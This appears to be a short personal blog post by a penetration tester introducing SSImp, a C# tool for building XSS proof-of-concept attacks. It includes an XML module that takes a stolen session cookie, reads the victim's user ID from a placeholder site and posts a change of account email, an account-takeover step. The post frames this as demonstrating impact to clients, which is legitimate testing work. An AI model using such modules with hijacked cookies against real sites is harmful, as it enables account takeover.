Well, long time no post. Been in hospital. Been busy with college. Life gets in the way of hacking.
Usually when one wast to illustrate an XSS vulnerability there are two approaches. The first is to show the client the XSS and assume that they know and understand the impact. The second is to write a fully fledged exploit which takes some form of action on the client's server so that they can see the truly devastating impact. I frequently find that the second of these options is the only possible way to draw attention to the problems of XSS, but I have also grown very tired of having to write these from scratch, setting up cookie loggers etc.
The solution that I have come up with is called the ServerSideImpersonator or SSImp.
Here's how it works:
- Find an injection point.
- Write a module that does what you want.
To explain what happens then...
Here's an example of a test module that I recently created:
<?xml version="1.0" encoding="utf-8" ?> <modules> <action name="the_action"> <requires type="querystring" name="cookie" /> <request url="https://www.victim.com/getauserid.php" type="get"> <setcookie type="querystring" name="cookie" /> <storevariable name="userid" type="regex" pattern="UserID=(\d+)" group="1" /> </request> <request url="https://www.victim.com/settings.php" type="post"> <setcookie type="querystring" name="cookie" /> <postdata value="Email=username%40gmail.com&UserID=[VAR:userid]&action=new+email"></postdata> </request> <output>UserID="[VAR:userid]".</output> </action> </modules>
So, what does this do?
- Makes a GET request to https://www.victim.com/getauserid.php, using the cookie that was passed in the cookie querystring parameter
- Looks on the resulting page for a regex match for UserID=(\d+) and if found stores Group 1, Capture 0 in the variable called userid
- Makes a POST request to https://www.victim.com/settings.php, using the cookie that was passed in the cookie querystring parameter, posting the data "Email=username%40gmail.com&UserID=[VAR:userid]&action=new+email" and substituting [VAR:userid] for the variable that was fetched in the previous request
This seems to me a far quicker way for constructing XSS PoC attacks and I will continue to update the framework as I get time. I also plan, time permitting, to get back to work on the .NETIDS which has lapsed in the last few months for the aforementioned reasons.
Check out the SSImp source (C#) at http://code.google.com/p/ssimp/